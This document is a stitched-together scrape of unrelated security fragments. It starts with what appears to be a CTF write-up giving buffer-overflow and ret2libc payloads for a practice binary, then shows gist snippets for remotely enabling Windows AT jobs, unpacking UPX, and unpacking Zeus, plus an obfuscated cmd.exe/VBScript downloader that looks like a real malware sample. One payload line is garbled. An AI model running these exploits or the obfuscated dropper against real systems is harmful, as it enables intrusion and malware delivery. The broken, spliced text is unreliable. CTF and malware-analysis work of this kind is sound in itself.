to overwrite the 'vulnerable_function' return address, we need 0x80 + 12 junk of buffer plus address of 'not_called'. So, the payload skeleton is: ["\x41"*(0x80 + 12)] + [address of 'not_called' subroutine]
(python -c 'import sys,struct;sys.stdout.write("\x41"*(0x80 + 12) + struct.pack("<I", 0x080484a4))'; cat -) | ./rop1-fa6168f4d8eba0eb
as same as rop-1. but, there is no function which call system('/bin/sh') like 'not_called' subroutine in rop-1. fortunately, there is a global variable called 'not_used' which value is '/bin/sh'. so, in this case we can use 'ret2libc' method to pwn that contrived binary. payload construction below:
["\x41"*(0x80 + 12) (in order to reach vulnerable_function return address)] + [libc_system addr] + [libc_exit addr (this is a fake libc_system return address)] + [address of 'not_used' global variable]
and then.. pwned!!
(python -c 'import sys,struct;sys.stdout.write("\x41"*(0x80 + 12) + struct.pack("<i struct.pack="" cat="" .=""></i>
very trivial though.. :v
(1) junk buffer is 0x80 + 12
(2) find address of libc_system in gdb
(3) find address of libc_exit in gdb
(4) find '/bin/sh' string in gdb (find &system,+9999999,"/bin/sh")
(5) pwned!
#! /usr/bin/python
import sys
import struct
if sys.byteorder == 'little':
Q = lambda x: struct.pack("<I", x)
elif sys.byteorder == 'big':
Q = lambda x: struct.pack(">I", x)
| # This code could be used to remotely enable and launch AT jobs regardless of the fact that AT is deprecated in Win8+. | |
| $HKLM = [UInt32] 2147483650 | |
| # Check to see if EnableAt is set | |
| $Result = Invoke-CimMethod -Namespace root/default -ClassName StdRegProv -MethodName GetDWORDValue -Arguments @{ | |
| hDefKey = $HKLM | |
| sSubKeyName = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration' | |
| sValueName = 'EnableAt' | |
| } |
| from x64dbgpy.pluginsdk import * | |
| import sys | |
| cip = register.GetCIP() | |
| if memory.ReadByte(cip) != 0x60: | |
| gui.Message("Start at UPX entry point (1:[CIP]==0x60)") | |
| exit(0) | |
| x64dbg.DbgCmdExecDirect("bc") | |
| x64dbg.DbgCmdExecDirect("bphwc") |
| #!/bin/sh | |
| # | |
| # `7MN. `7MF' | |
| # __, MMN. M | |
| #`7MM M YMb M pd""b. | |
| # MM M `MN. M (O) `8b | |
| # MM M `MM.M ,89 | |
| # MM M YMM ""Yb. | |
| #.JMML..JML. YM 88 | |
| # (O) .M' |
| cmd.exe /V /C set "FKO=%RANDOM%" && (for %i in ("Dim LXZxe0" "suB GdBocmWra2bHN()" "LCtcOqCDnnH=16+11" "On eRROR resUME neXt" "NVJjYA=9+60" "DIm I7U6poXRu,GiWuI,BoUfvWYBUkKj,IUJthZDvQAl" "Y9cKZng13vo=40+64" "IUJthZDvQAl="SVXQDEt1loQ6LlG"" "Q1u0qcM7Qv9Lv=98+61" "I7U6poXRu=SHpwygLQgHdJ("1C354D39787C1D224319463E002C172D5C67213C5F","MtA9IBS2U4nhQr")" "UUlJ36frjukOf=4+85" "seT GiWuI=cReaTeOBJEcT(SHpwygLQgHdJ("1B3132362A075E0A1B7F6E01200F070208",IUJthZDvQAl))" "PjtwgPXl=60+45" "GiWuI.opEN SHpwygLQgHdJ("320C31","KuIefPyEKG7jD28"),I7U6poXRu,0" "LxFoiv6rfAMR6=48+79" "GiWuI.setRequESthEaDer SHpwygLQgHdJ("1359183537","YA8vRRDzISQ1tmJ"),SHpwygLQgHdJ("51212E22364D666B4079","T3XZGEpRXr")" "D0jDQ36=89+30" "GiWuI.sEnd()" "Q30TTtK7H7DXR6BB8=65+76" "If GiWuI.STatUsTexT<>SHpwygLQgHdJ("172A1A0506562B7A0E152127173631","EGKhqo7GZMzOSrX") THen PEIwKPwhVFEYy2a" "L360=60+17" "eND Sub" "Sub NEWtZ()" "GPUDsi=67+57" "TfgjBtEZiAm1I" "Dim TlmAoztjgrep3nIj2,Umdr3G2bHN,FoHwraR,KzSFDJqxxi64,JyU1NQwdLZlhoO" "K0Q2UNY=9+6" "On ERRoR resumE nexT |
| By Tanguy Andreani | |
| Twitter: @andreani_tanguy | |
| Website: https://globalnewsys.wordpress.com/ | |
| Date: 1 July 2014 | |
| More than 1200 websites ! | |
| Blogs on Computer Security: | |
| https://antelox.blogspot.com/ |
| // Generic Zeus malware unpacker (ResumeThread) | |
| // by Miroslav Stampar (@stamparm) | |
| // http://about.me/stamparm | |
| VAR ResumeThread | |
| VAR msg | |
| VAR xname | |
| VAR xloc | |
| VAR xsize |